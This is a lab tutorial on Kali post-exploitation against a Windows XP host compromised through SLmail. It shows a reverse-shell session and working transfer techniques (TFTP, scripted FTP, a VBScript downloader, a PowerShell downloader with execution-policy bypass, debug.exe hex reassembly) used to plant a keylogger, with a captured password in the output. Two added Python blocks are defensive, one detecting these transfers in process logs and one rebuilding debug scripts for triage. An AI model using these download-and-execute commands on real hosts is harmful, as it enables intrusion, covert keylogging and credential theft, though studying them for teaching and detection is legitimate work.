Kali Post-Exploitation
I. Overview
• Upload tools
• Privilege escalation
• Erase traces of the attack
Delete system logs and application logs
Example (SLmail):
• Install a backdoor
• Long-term control
• Dump passwords
• Internal network penetration
• Post-exploitation phase
• The biggest challenge: anti-virus software (AV evasion)
• Use legitimate remote-control software (e.g. nc)
• Upload files
• Persistent control
• Extend control over the target system
• Linux systems
• netcat, curl, wget
curl and wget are always installed by default on Linux
• Windows
• Lacks pre-installed download tools, so downloading trojans and other tools is difficult
• Non-interactive shell (in this command window every command must be typed in full; there is no Tab completion)
• nc-style remote-control shell
• Difference between interactive and non-interactive shells: http://kuku789123.blog.163.com/blog/static/1361673512012101513628599/
• ftp IP
Install the FTP software on Windows to experience the limitations of a non-interactive shell: Add/Remove Windows Components [appwiz.cpl] [installation CD required]
Note: IIS 5.1 component installation package: https://www.cr173.com/soft/2482.html
Non-interactive:
Interactive:
II. Uploading Files
1. TFTP transfer
Installed by default on XP and Server 2003; on Windows 7 / Server 2008 and later it has to be added separately, and it is often filtered by the perimeter firewall. FTP is the mainstream choice, since TFTP is UDP-based, transmits in plaintext and has no authentication (files can be downloaded from the server without logging in).
In other words: set up a TFTP server, place the tools (trojans and so on) on it, and have the controlled host connect and download them.
1.1 Environment setup
Kali:
root@kali:~/Desktop# mkdir tftp
root@kali:~/Desktop# cp /usr/share/windows-binaries/whoami.exe tftp/    # whoami for Windows: shows the current user
root@kali:~/Desktop# cp /usr/share/windows-binaries/klogger.exe tftp/   # copy the keylogger
root@kali:~/Desktop# ls tftp/
klogger.exe  whoami.exe
root@kali:~/Desktop# ls tftp/ -l
total 92
-rwxr-xr-x 1 root root 23552 Feb  6 23:16 klogger.exe
-rwxr-xr-x 1 root root 66560 Feb  6 23:16 whoami.exe
root@kali:~/Desktop/tftp# chown -R nobody /root/Desktop/tftp/   # change the owner to nobody
root@kali:~/Desktop/tftp# ls -ll
total 92
-rwxr-xr-x 1 nobody root 23552 Feb  6 23:16 klogger.exe
-rwxr-xr-x 1 nobody root 66560 Feb  6 23:16 whoami.exe
root@kali:~/Desktop/tftp# atftpd --daemon --port 69 /root/Desktop/tftp/
root@kali:~/Desktop/tftp# netstat -pantu | grep 69
udp        0      0 0.0.0.0:69              0.0.0.0:*                           1636/atftpd
Because of a permissions problem, the following common issue appears (the process that starts is not tftp):
Kill process 543 and run chown -R nobody /tftp/ [changes the owner to nobody]
1.2 Transferring files through the shell
root@kali:~/Desktop# nc -vlp 444
listening on [any] 444 ...
10.10.10.131: inverse host lookup failed: Unknown host
connect to [10.10.10.171] from (UNKNOWN) [10.10.10.131] 1108
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Program Files\SLmail\System>cd \
cd \

C:\>tftp
tftp

Transfers files to and from a remote computer running the TFTP service.

TFTP [-i] host [GET | PUT] source [destination]

  -i              Specifies binary image transfer mode (also called
                  octet). In binary image mode the file is moved
                  literally, byte by byte. Use this mode when
                  transferring binary files.
  host            Specifies the local or remote host.
  GET             Transfers the file destination on the remote host to
                  the file source on the local host.
  PUT             Transfers the file source on the local host to
                  the file destination on the remote host.
  source          Specifies the file to transfer.
  destination     Specifies where to transfer the file.

C:\>tftp -i 10.10.10.171 get whoami.exe
tftp -i 10.10.10.171 get whoami.exe
Transfer successful: 66560 bytes in 1 second, 66560 bytes/s

C:\>tftp -i 10.10.10.171 get klogger.exe
tftp -i 10.10.10.171 get klogger.exe
Transfer successful: 23552 bytes in 1 second, 23552 bytes/s

C:\>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 0CCA-0323

 Directory of C:\

02/07/2022  12:40 PM                41 1.txt
08/14/2011  01:35 PM                 0 AUTOEXEC.BAT
08/14/2011  01:35 PM                 0 CONFIG.SYS
01/28/2022  01:28 PM    <DIR>          Documents and Settings
02/07/2022  11:40 AM             1,120 HistorySvr.txt
01/28/2010  06:10 PM    <DIR>          I386
02/07/2022  11:49 AM    <DIR>          Inetpub
02/07/2022  12:50 PM            23,552 klogger.exe
01/28/2022  01:38 PM    <DIR>          Program Files
01/27/2022  07:46 PM    <DIR>          Python27
02/07/2022  12:27 PM                 0 TFTP4092
02/07/2022  12:25 PM                 0 TFTP588
02/07/2022  12:50 PM            66,560 whoami.exe
02/07/2022  11:49 AM    <DIR>          WINDOWS
               8 File(s)         91,273 bytes
               6 Dir(s)  39,066,075,136 bytes free

C:\>whoami
whoami
NT AUTHORITY\SYSTEM

C:\>klogger
klogger

C:\>tasklist
tasklist

Image Name                   PID Session Name     Session#    Mem Usage
========================= ====== ================ ======== ============
System Idle Process            0 Console                 0         28 K
System                         4 Console                 0        236 K
smss.exe                     560 Console                 0        388 K
csrss.exe                    608 Console                 0      3,852 K
winlogon.exe                 632 Console                 0      1,620 K
services.exe                 676 Console                 0      4,312 K
lsass.exe                    688 Console                 0      1,476 K
vmacthlp.exe                 848 Console                 0      2,380 K
svchost.exe                  860 Console                 0      4,700 K
svchost.exe                  940 Console                 0      4,100 K
svchost.exe                 1032 Console                 0     21,332 K
svchost.exe                 1080 Console                 0      3,376 K
svchost.exe                 1124 Console                 0      4,284 K
spoolsv.exe                 1404 Console                 0      6,008 K
HistorySvr.exe              1572 Console                 0      3,248 K
sntlkeyssrvr.exe            1668 Console                 0      2,364 K
spnsrvnt.exe                1820 Console                 0      2,120 K
SLadmin.exe                 1836 Console                 0      3,088 K
SLSmtp.exe                  1908 Console                 0      4,748 K
vmtoolsd.exe                1944 Console                 0      8,484 K
SLMail.exe                  2020 Console                 0      5,208 K
VMUpgradeHelper.exe          176 Console                 0      3,856 K
alg.exe                     1100 Console                 0      3,432 K
explorer.exe                1708 Console                 0     24,048 K
VMwareTray.exe              2164 Console                 0      4,468 K
VMwareUser.exe              2196 Console                 0      7,688 K
ICQLite.exe                 2204 Console                 0     14,308 K
wscntfy.exe                 2216 Console                 0      1,904 K
inetinfo.exe                2324 Console                 0      9,720 K
cmd.exe                      516 Console                 0      2,508 K
ftp.exe                     1984 Console                 0      2,880 K
cmd.exe                     3996 Console                 0      2,504 K
ftp.exe                     4080 Console                 0      2,884 K
taskmgr.exe                 2824 Console                 0      1,344 K
cmd.exe                     3040 Console                 0      2,672 K
klogger.exe                  964 Console                 0        792 K
tasklist.exe                 592 Console                 0      4,080 K
wmiprvse.exe                2976 Console                 0      5,572 K

C:\>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 0CCA-0323

 Directory of C:\

02/07/2022  12:54 PM                30 1.txt
08/14/2011  01:35 PM                 0 AUTOEXEC.BAT
08/14/2011  01:35 PM                 0 CONFIG.SYS
01/28/2022  01:28 PM    <DIR>          Documents and Settings
02/07/2022  11:40 AM             1,120 HistorySvr.txt
01/28/2010  06:10 PM    <DIR>          I386
02/07/2022  11:49 AM    <DIR>          Inetpub
02/07/2022  12:50 PM            23,552 klogger.exe
02/07/2022  12:54 PM                32 klogger.txt
01/28/2022  01:38 PM    <DIR>          Program Files
01/27/2022  07:46 PM    <DIR>          Python27
02/07/2022  12:27 PM                 0 TFTP4092
02/07/2022  12:25 PM                 0 TFTP588
02/07/2022  12:50 PM            66,560 whoami.exe
02/07/2022  11:49 AM    <DIR>          WINDOWS
               9 File(s)         91,294 bytes
               6 Dir(s)  39,066,075,136 bytes free

C:\>type klogger.txt        # keystrokes recorded on the target
type klogger.txt
ausername:z9m8r8 password:1111s
C:\>
2. FTP transfer
2.1 Environment setup
root@kali:~/Desktop# apt-get install pure-ftpd
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following additional packages will be installed:
  libcrypt1 libpam0g pure-ftpd-common
Suggested packages:
……………………
Configuration script (ftp1.sh):
#!/bin/bash
groupadd ftpgroup
useradd -g ftpgroup -d /dev/null -s /etc ftpuser
pure-pw useradd yuanfh -u ftpuser -d /ftphome
pure-pw mkdb
cd /etc/pure-ftpd/auth/
ln -s ../conf/PureDB 60pdb
mkdir -p /ftphome
chown -R ftpuser:ftpgroup /ftphome/   # the FTP home directory just created
/etc/init.d/pure-ftpd restart
Running the script:
root@kali:~/Desktop/tftp# ./ftp1.sh
Password:           # remember the password set here; it is needed later
Enter it again:
Restarting pure-ftpd (via systemctl): pure-ftpd.service.
Copy the tools to be uploaded into /ftphome/:
root@kali:/# ls /ftphome/
root@kali:/# cp /usr/share/windows-binaries/whoami.exe /ftphome/
root@kali:/# cp /usr/share/windows-binaries/klogger.exe /ftphome/
Testing FTP:
Because the shell we currently have is non-interactive, the password prompt cannot be shown during an FTP transfer, so downloading directly with ftp does not work. Change of approach: write the commands to be executed into a text file on the target server, and have ftp read its commands from that file to perform the download.
2.2 Uploading files
C:\>echo open 10.10.10.171 21>ftp.txt
echo yuanfh>>ftp.txt
echo password>>ftp.txt         # password is the one set earlier
echo bin>>ftp.txt
echo GET whoami.exe >> ftp.txt
echo GET klogger.exe >> ftp.txt
echo bye >> ftp.txt
echo open 10.10.10.171 21>ftp.txt

C:\>echo yuanfh>>ftp.txt

C:\>echo password>>ftp.txt

C:\>echo bin>>ftp.txt

C:\>echo GET whoami.exe >> ftp.txt

C:\>echo GET klogger.exe >> ftp.txt

C:\>echo bye >> ftp.txt

C:\>type ftp.txt
type ftp.txt
open 10.10.10.171 21
yuanfh
password
bin
GET whoami.exe
GET klogger.exe
bye

C:\>ftp -s:ftp.txt
ftp -s:ftp.txt
User (10.10.10.171:(none)): open 10.10.10.171 21
bin
GET whoami.exe
GET klogger.exe
bye

C:\>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 0CCA-0323

 Directory of C:\

02/07/2022  12:54 PM                30 1.txt
08/14/2011  01:35 PM                 0 AUTOEXEC.BAT
08/14/2011  01:35 PM                 0 CONFIG.SYS
01/28/2022  01:28 PM    <DIR>          Documents and Settings
02/07/2022  02:25 PM                89 ftp.txt
02/07/2022  11:40 AM             1,120 HistorySvr.txt
01/28/2010  06:10 PM    <DIR>          I386
02/07/2022  11:49 AM    <DIR>          Inetpub
02/07/2022  02:26 PM            23,552 klogger.exe
01/28/2022  01:38 PM    <DIR>          Program Files
01/27/2022  07:46 PM    <DIR>          Python27
02/07/2022  12:27 PM                 0 TFTP4092
02/07/2022  12:25 PM                 0 TFTP588
02/07/2022  02:26 PM            66,560 whoami.exe
02/07/2022  11:49 AM    <DIR>          WINDOWS
               9 File(s)         91,351 bytes
               6 Dir(s)  39,067,385,856 bytes free

C:\>whoami
whoami
NT AUTHORITY\SYSTEM

C:\>
3. VBScript transfer
VBS is the interpreted scripting language installed by default on Windows (from Windows 7 on, Perl was added as well). The remote-control program is downloaded over HTTP from a web server.
3.1 Environment setup
root@kali:/# cd /var/www/html/
root@kali:/var/www/html# ls
index.html  index.nginx-debian.html
root@kali:/var/www/html# cp /ftphome/* .
root@kali:/var/www/html# ls
index.html  index.nginx-debian.html  klogger.exe  whoami.exe
root@kali:/var/www/html# service apache2 start
root@kali:/var/www/html# netstat -pantu | grep 80
tcp6       0      0 :::80                   :::*                    LISTEN      27486/apache2
3.2 File transfer
Command set:
rem Each echo appends one line of VBScript to wget.vbs; the script takes the URL and the output file name as its two arguments.
rem Spelling of the object names and of Nothing / Midb / Scripting has been corrected here; the original had typos in them.
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET", strUrl, False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
rem Write the response body byte by byte so the binary survives the text stream.
echo For lngCounter = 0 To UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And AscB(MidB(varByteArray, lngCounter + 1, 1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs
After pasting the commands above into the shell window, run cscript wget.vbs http://10.10.10.171/whoami.exe w.exe (the cscript command that ships with Windows downloads whoami.exe and saves it as w.exe).
Script execution error message (unsolved; if anyone can see what the problem is, please point it out, much appreciated):
C:\>cscript wget.vbs http://10.10.10.171/whoami.exe whoami.exe
cscript wget.vbs http://10.10.10.171/whoami.exe whoami.exe
Microsoft (R) Windows Script Host Version 5.7
Copyright (C) Microsoft Corporation. All rights reserved.

C:\wget.vbs(3, 6) Microsoft VBScript compilation error: Syntax error
4. PowerShell transfer
Similar to the VBS transfer: again the program is downloaded from the server to the target, but note that it has to be run on Windows 7 / 8 or later.
Command set (wget.ps1):
$storageDir = $pwd                                  # directory the download is saved into
$webclient = New-Object System.Net.WebClient
$url = "http://10.10.10.171/whoami.exe"
$file = Join-Path $storageDir "new-exsploit.exe"   # absolute path: DownloadFile resolves a bare name against the process directory, not $pwd
$webclient.DownloadFile($url, $file)                # the original was missing the '.' between $webclient and DownloadFile
Running the script:
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
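Each of the transfer methods in sections 1 to 4 leaves a distinctive process-creation record on the Windows host, and the shell itself shows up as cmd.exe spawned by the SLmail service binary (the SLMail.exe / SLSmtp.exe seen in the tasklist output above). The Python below is an added example, not part of the original post: it runs a handful of such rules over constructed Sysmon-style process-creation records. The records, the rule names and the scan() function are assumptions for illustration, not real telemetry or any product's rule set.

```python
import re
from typing import Callable

Event = dict[str, str]

# Constructed Sysmon-style process-creation records (Event ID 1 fields).
# They mirror the session in this write-up and are NOT captured telemetry.
SAMPLE_EVENTS: list[Event] = [
    {"ParentImage": r"C:\Program Files\SLmail\System\SLMail.exe",
     "Image": r"C:\WINDOWS\system32\cmd.exe", "CommandLine": "cmd.exe"},
    {"ParentImage": r"C:\WINDOWS\system32\cmd.exe",
     "Image": r"C:\WINDOWS\system32\tftp.exe",
     "CommandLine": "tftp -i 10.10.10.171 get whoami.exe"},
    {"ParentImage": r"C:\WINDOWS\system32\cmd.exe",
     "Image": r"C:\WINDOWS\system32\ftp.exe", "CommandLine": "ftp -s:ftp.txt"},
    {"ParentImage": r"C:\WINDOWS\system32\cmd.exe",
     "Image": r"C:\WINDOWS\system32\cscript.exe",
     "CommandLine": "cscript wget.vbs http://10.10.10.171/whoami.exe w.exe"},
    {"ParentImage": r"C:\WINDOWS\system32\cmd.exe",
     "Image": r"C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -ExecutionPolicy Bypass -NoLogo "
                    "-NonInteractive -NoProfile -File wget.ps1"},
    # benign control record: must not match anything
    {"ParentImage": r"C:\WINDOWS\explorer.exe",
     "Image": r"C:\WINDOWS\system32\notepad.exe", "CommandLine": "notepad.exe"},
]


def _basename(path: str) -> str:
    """Last path component, lower-cased (Windows paths use backslashes)."""
    return path.rsplit("\\", 1)[-1].lower()


def _cmd(event: Event) -> str:
    return event.get("CommandLine", "").lower()


# (rule name, predicate).  Each predicate encodes one pattern from the write-up.
RULES: list[tuple[str, Callable[[Event], bool]]] = [
    # The reverse shell: cmd.exe whose parent is the mail server service.
    ("mail_service_spawns_shell",
     lambda e: _basename(e["Image"]) == "cmd.exe"
     and _basename(e["ParentImage"]) in {"slmail.exe", "slsmtp.exe"}),
    # Section 1: tftp.exe in binary mode pulling or pushing a file.
    ("tftp_binary_transfer",
     lambda e: _basename(e["Image"]) == "tftp.exe"
     and re.search(r"(^|\s)-i\s+\S+\s+(get|put)\b", _cmd(e)) is not None),
    # Section 2: ftp.exe driven by a command file (the non-interactive workaround).
    ("ftp_scripted_session",
     lambda e: _basename(e["Image"]) == "ftp.exe" and "-s:" in _cmd(e)),
    # Section 3: a script host running a .vbs that is handed an HTTP URL.
    ("script_host_http_download",
     lambda e: _basename(e["Image"]) in {"cscript.exe", "wscript.exe"}
     and ".vbs" in _cmd(e)
     and ("http://" in _cmd(e) or "https://" in _cmd(e))),
    # Section 4: powershell with the execution policy bypassed, running a script file.
    ("powershell_bypass_script_file",
     lambda e: _basename(e["Image"]) == "powershell.exe"
     and "-executionpolicy bypass" in _cmd(e) and "-file " in _cmd(e)),
]


def scan(events: list[Event]) -> dict[int, list[str]]:
    """Map event index -> names of the rules it matched; unmatched events are omitted."""
    hits: dict[int, list[str]] = {}
    for idx, event in enumerate(events):
        matched = [name for name, pred in RULES if pred(event)]
        if matched:
            hits[idx] = matched
    return hits


if __name__ == "__main__":
    for idx, names in scan(SAMPLE_EVENTS).items():
        print(f"[{idx}] {SAMPLE_EVENTS[idx]['CommandLine']} -> {', '.join(names)}")
```

The rules match on image name plus command-line shape rather than on the exact file names used here, so renaming wget.vbs or ftp.txt does not evade them; the mail-service parent check is the one that fires before any tool is transferred at all.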
5. Debug transfer
Debug is an assembler/disassembler and hex dump tool. Used for file transfer it can only move 64 KB of data by default (it can also modify the BIOS). Could we simply echo a binary file into a file line by line? No, but the idea works with a twist: convert the binary file to text, transfer that, and finally use the debug command to turn it back into binary.
Compression on the Kali side
root@kali:~/Desktop/test# ls -alh whoami.exe
-rwxr-xr-x 1 root root 65K Feb  7 03:09 whoami.exe
root@kali:~/Desktop/test# upx -9 whoami.exe     # -9: highest compression level
                       Ultimate Packer for eXecutables
                          Copyright (C) 1996 - 2018
UPX 3.95        Markus Oberhumer, Laszlo Molnar & John Reiser   Aug 26th 2018

        File size         Ratio      Format      Name
   --------------------   ------   -----------   -----------
     66560 ->     21113   31.72%    win32/pe     whoami.exe

Packed 1 file.
root@kali:~/Desktop/test# ls -alh whoami.exe
-rwxr-xr-x 1 root root 21K Feb  7 03:09 whoami.exe
Convert the binary file to be transferred into a text file
Taking whoami.exe as an example (copy /usr/share/windows-binaries/exe2bat.exe and whoami.exe to the Windows machine):
The conversion can of course also be done on Kali, but that requires an execution environment for Windows programs (wine).
Details: https://www.cnblogs.com/z9m8r8/articles/15864240.html
Transferring the file
C:\>echo n 1.dll >123.hex
echo e 0100 >>123.hex
echo 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 >>123.hex
echo e 0180 >>123.hex
……………………
……………………
……………………
C:\>echo r cx >>123.hex

C:\>echo 5279 >>123.hex

C:\>echo w >>123.hex

C:\>echo q >>123.hex

C:\>
C:\>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 0CCA-0323

 Directory of C:\

02/07/2022  12:54 PM                30 1.txt
02/07/2022  04:21 PM            65,516 123.hex
08/14/2011  01:35 PM                 0 AUTOEXEC.BAT
08/14/2011  01:35 PM                 0 CONFIG.SYS
01/28/2022  01:28 PM    <DIR>          Documents and Settings
02/07/2022  03:00 PM             1,176 HistorySvr.txt
01/28/2010  06:10 PM    <DIR>          I386
02/07/2022  11:49 AM    <DIR>          Inetpub
01/28/2022  01:38 PM    <DIR>          Program Files
01/27/2022  07:46 PM    <DIR>          Python27
02/07/2022  03:30 PM               172 test.ps1
02/07/2022  12:27 PM                 0 TFTP4092
02/07/2022  12:25 PM                 0 TFTP588
02/07/2022  03:21 PM             1,113 wget.vbs
02/07/2022  11:49 AM    <DIR>          WINDOWS
               9 File(s)         68,007 bytes
               6 Dir(s)  39,068,635,136 bytes free

C:\>debug<123.hex
debug<123.hex
-n 1.dll
-e 0100
0ACA:0100  24.4d   99.5a   04.90   80.00   0E.03   1E.00   99.00   04.00
0ACA:0108  80.04   3E.00   1F.00   99.00   00.ff   75.ff   24.00   80.00
0ACA:0110  3E.b8   62.00   97.00   01.00   74.00   1D.00   E8.00   5B.00
0ACA:0118  03.40   75.00   18.00   80.00   34.00   00.00   B9.00   0A.00
0ACA:0120  75.00   11.00   BA.00   EC.00   89.00   E8.00   4B.00   10.00
0ACA:0128  C7.00   06.00   21.00   96.00   00.00   00.00   FE.00   06.00
0ACA:0130  23.00   99.00   C3.00   8B.00   1E.00   5F.00   98.00   33.00
……………………
……………………
……………………
0ACA:5370  00.00   00.00   00.00   00.00   00.00   00.00   00.00   00.00
0ACA:5378  00.00   00.     00.     00.
-r cx
CX 0000
:5279
-w
Writing 05279 bytes
-q

C:\>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 0CCA-0323

 Directory of C:\

02/07/2022  04:21 PM            21,113 1.DLL
02/07/2022  12:54 PM                30 1.txt
02/07/2022  04:21 PM            65,516 123.hex
08/14/2011  01:35 PM                 0 AUTOEXEC.BAT
08/14/2011  01:35 PM                 0 CONFIG.SYS
01/28/2022  01:28 PM    <DIR>          Documents and Settings
02/07/2022  03:00 PM             1,176 HistorySvr.txt
01/28/2010  06:10 PM    <DIR>          I386
02/07/2022  11:49 AM    <DIR>          Inetpub
01/28/2022  01:38 PM    <DIR>          Program Files
01/27/2022  07:46 PM    <DIR>          Python27
02/07/2022  03:30 PM               172 test.ps1
02/07/2022  12:27 PM                 0 TFTP4092
02/07/2022  12:25 PM                 0 TFTP588
02/07/2022  03:21 PM             1,113 wget.vbs
02/07/2022  11:49 AM    <DIR>          WINDOWS
              10 File(s)         89,120 bytes
               6 Dir(s)  39,068,598,272 bytes free

C:\>copy 1.dll whoami.exe
copy 1.dll whoami.exe
        1 file(s) copied.

C:\>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 0CCA-0323

 Directory of C:\

02/07/2022  04:21 PM            21,113 1.DLL
02/07/2022  04:21 PM            65,516 123.hex
08/14/2011  01:35 PM                 0 AUTOEXEC.BAT
08/14/2011  01:35 PM                 0 CONFIG.SYS
01/28/2022  01:28 PM    <DIR>          Documents and Settings
02/07/2022  03:00 PM             1,176 HistorySvr.txt
01/28/2010  06:10 PM    <DIR>          I386
02/07/2022  11:49 AM    <DIR>          Inetpub
01/28/2022  01:38 PM    <DIR>          Program Files
01/27/2022  07:46 PM    <DIR>          Python27
02/07/2022  03:30 PM               172 test.ps1
02/07/2022  12:27 PM                 0 TFTP4092
02/07/2022  12:25 PM                 0 TFTP588
02/07/2022  03:21 PM             1,113 wget.vbs
02/07/2022  04:21 PM            21,113 whoami.exe
02/07/2022  11:49 AM    <DIR>          WINDOWS
              10 File(s)        110,203 bytes
               6 Dir(s)  39,068,573,696 bytes free

C:\>whoami
whoami
NT AUTHORITY\SYSTEM

C:\>
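When a 123.hex script like the one above is recovered from a host, or only the transcript of the echo lines that produced it survives, the dropped file can be rebuilt for triage without running debug.exe. The Python below is an added example, not part of the original post and not exe2bat: rebuild_from_debug_script() replays the n / e / r cx / w / q commands, enforces the 64 KB segment limit mentioned above, and trims the output to the CX value exactly as debug's w command does; from_echo_transcript() strips the echo ... >>123.hex wrapper. SAMPLE_TRANSCRIPT is constructed from the first 32 header bytes shown above (16 bytes per e line instead of exe2bat's 128) and is not a complete executable; all function names are this example's own.

```python
import re

LOAD_OFFSET = 0x0100      # debug's e and w commands address data from CS:0100
SEGMENT_LIMIT = 0x10000   # one 64 KB segment, the ceiling the write-up mentions


def from_echo_transcript(transcript: str) -> str:
    """Recover the script that the 'echo ... >>123.hex' lines of a shell
    transcript wrote; a leading C:\\> prompt is dropped as well."""
    out = []
    for line in transcript.splitlines():
        line = line.strip()
        if line.startswith("C:\\>"):
            line = line[4:].strip()
        if not line.lower().startswith("echo "):
            continue
        # strip the trailing '>file' / '>>file' redirection
        out.append(re.split(r"\s*>{1,2}\s*\S+\s*$", line[5:])[0])
    return "\n".join(out)


def rebuild_from_debug_script(script: str) -> tuple[str, bytes]:
    """Replay n / e / r cx / w / q and return (file name, bytes that w writes)."""
    lines = [ln.strip() for ln in script.splitlines() if ln.strip()]
    name, cx, written = None, None, False
    memory = bytearray()
    i = 0
    while i < len(lines):
        cmd, _, arg = lines[i].partition(" ")
        cmd, arg = cmd.lower(), arg.strip()
        i += 1
        if cmd == "n":                      # n <file>: name of the output file
            name = arg
        elif cmd == "e":                    # e <addr>: the byte values follow on the next line
            if i >= len(lines):
                raise ValueError(f"e {arg}: no data line follows")
            offset = int(arg, 16) - LOAD_OFFSET
            data = bytes.fromhex(lines[i])
            i += 1
            if offset < 0 or LOAD_OFFSET + offset + len(data) > SEGMENT_LIMIT:
                raise ValueError(f"e {arg}: data falls outside the 64 KB segment")
            end = offset + len(data)
            if len(memory) < end:
                memory.extend(bytes(end - len(memory)))
            memory[offset:end] = data
        elif cmd == "r" and arg.lower() == "cx":   # r cx: new value on the next line
            cx = int(lines[i], 16)
            i += 1
        elif cmd == "w":                    # w: write CX bytes from CS:0100 to the named file
            written = True
        elif cmd == "q":
            break
        else:
            raise ValueError(f"unsupported debug command: {lines[i - 1]}")
    if name is None or cx is None or not written:
        raise ValueError("script must name a file (n), set CX (r cx) and write (w)")
    if cx > len(memory):
        raise ValueError(f"CX={cx:#x} but only {len(memory)} bytes were entered")
    return name, bytes(memory[:cx])


def looks_like_mz(data: bytes) -> bool:
    """Quick triage check: a DOS/PE image starts with the 'MZ' magic."""
    return data[:2] == b"MZ"


# Constructed transcript: first 32 bytes of the MZ header shown in the write-up,
# CX deliberately set to 0x1e so the trailing two bytes are dropped by 'w'.
SAMPLE_TRANSCRIPT = """\
C:\\>echo n 1.dll >123.hex
echo e 0100 >>123.hex
echo 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 >>123.hex
echo e 0110 >>123.hex
echo b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 >>123.hex
C:\\>echo r cx >>123.hex
C:\\>echo 001e >>123.hex
C:\\>echo w >>123.hex
C:\\>echo q >>123.hex
"""


def rebuild_sample() -> tuple[str, bytes]:
    return rebuild_from_debug_script(from_echo_transcript(SAMPLE_TRANSCRIPT))


if __name__ == "__main__":
    name, data = rebuild_sample()
    print(f"{name}: {len(data)} bytes, MZ header: {looks_like_mz(data)}")
```

On the real 123.hex above the r cx value is 5279, and 0x5279 is 21113, the size of the UPX-packed whoami.exe and of the 1.DLL that appears in the dir listing; the CX check in the function is what makes a truncated or tampered script fail loudly instead of yielding a silently short file.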